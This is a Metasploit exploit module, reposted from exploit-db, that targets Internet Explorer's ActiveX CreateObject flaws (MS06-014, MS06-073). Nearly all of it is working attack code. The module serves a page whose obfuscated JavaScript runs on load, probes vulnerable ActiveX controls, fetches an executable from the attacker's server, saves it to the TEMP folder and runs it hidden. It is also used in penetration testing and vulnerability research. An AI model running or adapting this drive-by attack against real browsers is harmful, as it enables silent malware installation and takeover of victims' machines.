Microsoft Internet Explorer – COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit) - 体验盒子

作者： Metasploit
日期： 2010-09-20
类别：
remote
平台：
windows
来源：https://www.exploit-db.com/exploits/16561/
##
# $Id: ie_createobject.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML
	include Msf::Exploit::Seh
	include Msf::Exploit::EXE

	include Msf::Exploit::Remote::BrowserAutopwn
	autopwn_info({
		:ua_name=> HttpClients::IE,
		# In badly misconfigured situations, IE7 and 8 could be vulnerable to
		# this, but by default they throw an ugly popup that stops all script
		# execution until the user deals with it and aborts everything if they
		# click "no".Not worth the risk of being unable to try more recent
		# exploits.Make sure service packs on top of 6.0 are considered less
		# than the max by setting to 6.1 (which doesn't really exist).
		:ua_maxver=> "6.1",
		:javascript => true,
		:os_name=> OperatingSystems::WINDOWS,
		:vuln_test=> 'CreateObject',
		:classid=>
			[
					'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
					'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
					'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
					'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
					'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
					'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
					'{639F725F-1B2D-4831-A9FD-874847682010}',
					'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
					'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
					'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
					'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
					'{0006F033-0000-0000-C000-000000000046}',
					'{0006F03A-0000-0000-C000-000000000046}',
			],
		#:rank => ExcellentRanking# reliable exe writer
	})

	def initialize(info = {})
		super(update_info(info,
			'Name' => 'Internet Explorer COM CreateObject Code Execution',
			'Description'=> %q{
					This module exploits a generic code execution vulnerability in Internet
				Explorer by abusing vulnerable ActiveX objects.
			},
			'License'=> MSF_LICENSE,
			'Author' =>
				[
					'hdm',
				],
			'Version'=> '$Revision: 10394 $',
			'References' =>
				[
					# MDAC
					[ 'MSB', 'MS06-014' ],
					[ 'CVE', '2006-0003' ],
					[ 'OSVDB', '24517' ],
					# WMI Object Broker
					[ 'MSB', 'MS06-073' ],
					[ 'CVE', '2006-4704' ],
					[ 'OSVDB', '30155' ],
				],
			'Payload'=>
				{
					'Space' => 2048,
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'=>
				[
					[ 'Automatic', { } ],

					# Patched
					[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
					# Found in mpack
					[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],

					# Patched
					[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],

					# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
					[ 'UNKNOWN- SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
					[ 'UNKNOWN- SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],

					# Visual Studio components, not marked as safe
					[ 'UNKNOWN- VsmIDE.DTE',{ 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
					[ 'UNKNOWN- DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
					[ 'UNKNOWN- VisualStudio.DTE.8.0',{ 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
					[ 'UNKNOWN- Microsoft.DbgClr.DTE.8.0',{ 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
					[ 'UNKNOWN- VsaIDE.DTE',{ 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],

					#
					# The controls below can launch the "installing component" dialogs...
					#

					# Not marked as safe
					[ 'UNKNOWN- Business Object Factory ',{ 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],

					# Not marked as safe
					[ 'UNKNOWN- Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],

					# Found exploitable in the wild (no details)
					[ 'UNKNOWN- Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],

				],
			'DefaultTarget'=> 0,
			'DisclosureDate' => 'Apr 11 2006'))
	end

	def on_request_uri(cli, request)

		if (request.uri.match(/payload/))
			return if ((p = regenerate_payload(cli)) == nil)
			data = generate_payload_exe({ :code => p.encoded })
			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
			return
		end

		# Build out the HTML response page
		var_html = rand_text_alpha(rand(30)+2)
		var_func_exploit = rand_text_alpha(rand(30)+2);
		var_func_go= rand_text_alpha(rand(30)+2);
		var_func_createo = rand_text_alpha(rand(30)+2);
		var_exe_name = rand_text_alpha(rand(30)+2);
		var_objects = ''

		# Build the object list based on target selection
		if (target.name == 'Automatic')
			targets.each do |t|
				next if not t['CLSID']
				var_objects += t['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
			end
		else
			var_objects += target['CLSID'].unpack('C*').map{|c| " '#{c.chr}' "}.join("+") + ","
		end


		content = %Q^
<html><head><title></title>
<script language="javascript">

function #{var_func_createo}( o , n ) {
	var r = null;

	try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}

	if (! r) {
		try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
	}

	if (! r) {
		try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
	}

	if (! r) {
		try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
	}

	if (! r) {
		try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
	}

	if (! r) {
		try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
	}

	return( r );
}

function #{var_func_go}( a ) {

	var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );

	var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );

	var e = s.Environment( "P" + "ro" + "ce" + "ss" );


	var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
	var xml = null;
	var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
	var dat;

	try { xml=new XMLHttpRequest(); }
	catch(e) {
		try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
		catch(e) {
			xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
		}
	}

	if (! xml) {
		return(0);
	}

	xml.open("GET", url, false);
	xml.send(null);
	dat = xml.responseBody;

	o.Type = 1 ;
	o.Mode = 3 ;
	o.Open ( ) ;
	o.Write ( dat ) ;
	o.SaveToFile ( bin, 2) ;

	s.Run ( bin , 0 );
}

function #{var_func_exploit}( ) {
	var i = 0;
	var t = new Array( #{var_objects} null );

	while (t[i]) {
		var a = null;

		if (t[i].substring(0,1) == '{') {
			a = document.createElement("object");
			a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
		} else {
			try { a = new ActiveXObject(t[i]); } catch(e){}
		}

		if (a) {
			try {
				var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
				if (b) {
					#{var_func_go}( a ) ;
					return(0) ;
				}
			} catch(e){
			}
		}
		i++;
	}
}
</script>
</head>
<body onload='#{var_func_exploit}()'>
#{var_html}
</body>
</html>

^


		content = Rex::Text.randomize_space(content)

		print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...")

		# Transmit the response to the client
		send_response_html(cli, content)

		# Handle the payload
		handler(cli)
	end

end